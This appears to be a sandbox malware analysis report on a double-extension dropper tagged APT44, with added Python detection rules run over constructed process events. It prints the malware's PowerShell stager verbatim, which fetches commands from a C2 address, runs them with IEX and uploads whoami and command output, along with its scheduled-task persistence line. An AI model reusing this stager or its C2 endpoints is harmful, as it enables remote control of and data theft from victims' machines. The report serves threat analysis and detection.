Windows
Analysis Report
0438.doc.exe
Overview
General Information
Sample name: | 0438.doc.exe (renamed because the original name is a hash value) |
Original sample name: | 05.2022 -..doc.exe |
Analysis ID: | 1431573 |
MD5: | b8a51009c3b6ed621e6c50c49b2e6269 |
SHA1: | 485b1c739d4c7aaa22a58af4afecc20b71d662de |
SHA256: | d02075bb8cfa13ee496efdca74ec024ea5777559ba82e57bd2ed24354fb8e594 |
Tags: | APT44, exe, SHARPIVORY |
Detection
LonePage
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Yara detected LonePage
.NET source code contains suspicious base64 encoded strings
.NET source code contains very large strings
Bypasses PowerShell execution policy
Machine Learning detection for sample
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses an obfuscated file name to hide its real file extension (double extension)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- 0438.doc.exe (PID: 6984, cmdline: "C:\Users\user\Desktop\0438.doc.exe", MD5: B8A51009C3B6ED621E6C50C49B2E6269)
  - WINWORD.EXE (PID: 2296, cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\05.2022 ??????? ??????????-????.??????.doc" /o "", MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678) (the ? characters stand for non-ASCII characters of the decoy document name that this extract did not preserve)
  - schtasks.exe (PID: 5728, cmdline: "C:\Windows\System32\schtasks.exe" /create /tn OneDriveStandal0ne /tr C:\Users\Public\Libraries\OneDriveUpdate.js /sc minute /mo 20 /f, MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    - conhost.exe (PID: 5736, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- wscript.exe (PID: 3716, cmdline: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\OneDriveUpdate.js", MD5: A47CBE969EA935BDD3AB568BB126BC80) (top-level in the captured tree, consistent with launch by the OneDriveStandal0ne task, which fires every 20 minutes)
  - powershell.exe (PID: 7424, cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $iik=new-object net.webclient;$flm=$iik.downloaddata('http://217.12.218.107:30139/GvAIGRxavbGeLRAx/page61/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$bjdo+=IEX $jkr|out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};$ujk=new-object net.webclient;$ujk.uploaddata('http://217.12.218.107:25928/page61',$drpy);}, MD5: 04029E121A0CFA5991749937DD22A1D9)
    - conhost.exe (PID: 7432, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup

The PowerShell one-liner is the tasking loop: it fetches upgrade.txt from 217.12.218.107:30139 with WebClient.DownloadData and, if the response is non-empty, decodes it as UTF-8 and runs it with IEX. If the tasking text contains 'get-content', the IEX result is kept as raw bytes (a file read); otherwise the output of whoami, the result of [System.Net.Dns]::GetHostAddresses($ip) (note that $ip is never assigned anywhere in the command line) and the command output are concatenated and UTF-8 encoded. Either way the bytes are sent back with WebClient.UploadData (an HTTP POST) to 217.12.218.107:25928/page61. Both ports are non-standard, which is what the "Detected TCP or UDP traffic on non-standard ports" signature above refers to.
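Detection logic for the execution chain above, run over constructed process-creation events. This is an added example written for this page; it is not Joe Security's signature code and not the Sigma rules listed below. The events mirror the process tree (command lines as shown in the report, parent PIDs assumed from the tree layout, decoy document name replaced by a placeholder, field names assumed to be Sysmon-like); the rule names, thresholds and the benign control event are the example's own.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One ProcessCreate record. Field names are assumed (Sysmon-like)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# The PowerShell stager command line from this report, split only for readability.
PS_STAGER_CMD = (
    r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c '''
    r'''$iik=new-object net.webclient;$flm=$iik.downloaddata('http://217.12.218.107:30139/GvAIGRxavbGeLRAx/page61/upgrade.txt');'''
    r'''if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}'''
    r'''else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;'''
    r'''$bjdo+=IEX $jkr|out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};'''
    r'''$ujk=new-object net.webclient;$ujk.uploaddata('http://217.12.218.107:25928/page61',$drpy);}'''
)

# Constructed events mirroring the report's process tree. Parent PIDs are assumed
# from the tree layout; "decoy.doc" is a placeholder for the unpreserved name.
EVENTS = [
    ProcEvent(6984, 4000, r"C:\Users\user\Desktop\0438.doc.exe",
              r'"C:\Users\user\Desktop\0438.doc.exe"'),
    ProcEvent(2296, 6984, r"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE",
              r'"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\05.2022 decoy.doc" /o ""'),
    ProcEvent(5728, 6984, r"C:\Windows\System32\schtasks.exe",
              r'"C:\Windows\System32\schtasks.exe" /create /tn OneDriveStandal0ne /tr C:\Users\Public\Libraries\OneDriveUpdate.js /sc minute /mo 20 /f'),
    ProcEvent(3716, 1100, r"C:\Windows\System32\wscript.exe",  # parent (task scheduler) is assumed
              r'C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\OneDriveUpdate.js"'),
    ProcEvent(7424, 3716, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", PS_STAGER_CMD),
    # Benign control (constructed): an interactive PowerShell launch that must not alert.
    ProcEvent(4100, 4000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -c Get-Date'),
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
DOUBLE_EXT = re.compile(r"\.(?:doc|docx|pdf|xls|xlsx|ppt|pptx|txt|jpg|png)\.(?:exe|scr|com|pif|bat|cmd|js|vbs)$")
SCRIPT_EXT = re.compile(r"\.(?:js|jse|vbs|vbe|wsf|hta)\b")
TASK_RUN_PUBLIC = re.compile(r'/tr\s+"?c:\\users\\public\\')  # /tr action under C:\Users\Public
PS_INDICATORS = {
    "execution_policy_bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass"),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden"),
    "web_download": re.compile(r"net\.webclient|download(?:data|string|file)|invoke-webrequest|\biwr\b"),
    "dynamic_eval": re.compile(r"\biex\b|invoke-expression"),
    "web_upload": re.compile(r"upload(?:data|string|file)"),
}
URL_RE = re.compile(r"""https?://[^\s'"()]+""")


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_double_extension(ev: ProcEvent) -> bool:
    """A document-looking file name that is really an executable (0438.doc.exe)."""
    return DOUBLE_EXT.search(basename(ev.image)) is not None


def rule_schtasks_script_in_public(ev: ProcEvent) -> bool:
    """schtasks /create whose action is a script-host file under the Public profile."""
    cl = ev.cmdline.lower()
    return (basename(ev.image) == "schtasks.exe" and "/create" in cl
            and TASK_RUN_PUBLIC.search(cl) is not None
            and SCRIPT_EXT.search(cl) is not None)


def rule_powershell_stager(ev: ProcEvent):
    """Score a PowerShell command line; at least 3 co-occurring indicators are required."""
    if basename(ev.image) not in POWERSHELL:
        return None
    cl = ev.cmdline.lower()
    hits = [name for name, rx in PS_INDICATORS.items() if rx.search(cl)]
    if len(hits) < 3:
        return None
    return {"indicators": hits, "urls": URL_RE.findall(ev.cmdline)}


def ancestors(ev: ProcEvent, by_pid: dict, depth: int = 2) -> list:
    """Walk up to `depth` parents, so wscript -> cmd.exe -> powershell is also caught."""
    out, cur = [], ev
    for _ in range(depth):
        cur = by_pid.get(cur.ppid)
        if cur is None:
            break
        out.append(cur)
    return out


def analyze(events: list) -> list:
    """Return (pid, rule_name, details) alerts for the given events."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for ev in events:
        if rule_double_extension(ev):
            alerts.append((ev.pid, "double_extension_executable", {"image": ev.image}))
        if rule_schtasks_script_in_public(ev):
            alerts.append((ev.pid, "schtasks_script_persistence", {"cmdline": ev.cmdline}))
        stager = rule_powershell_stager(ev)
        if stager is not None:
            stager["spawned_by_script_host"] = any(
                basename(a.image) in SCRIPT_HOSTS for a in ancestors(ev, by_pid))
            alerts.append((ev.pid, "powershell_stager", stager))
    return alerts


if __name__ == "__main__":
    for pid, rule, details in analyze(EVENTS):
        print(pid, rule, details)
```

On the sample events this yields three alerts (the double-extension dropper, the schtasks persistence, and the stager with all five indicators, both C2 URLs and spawned_by_script_host set) and nothing for the benign control. Requiring several co-occurring PowerShell indicators rather than any single one is what keeps a rule like this usable on real process telemetry, and walking two ancestors covers the "via cmd or directly" case that the Wscript-starts-PowerShell signature above describes.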
No configs have been found
Source | Rule | Description | Author | Strings
---|---|---|---|---
 | JoeSecurity_LonePage | Yara detected LonePage | Joe Security |

Source | Rule | Description | Author | Strings
---|---|---|---|---
 | JoeSecurity_LonePage | Yara detected LonePage | Joe Security |

(9 entries in total; the 5 shown all match JoeSecurity_LonePage. Source values are not preserved in this extract.)
System Summary

Sigma rule authors (rule names and sources are not preserved in this extract):
- Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems)
- Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
- Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community
- frack113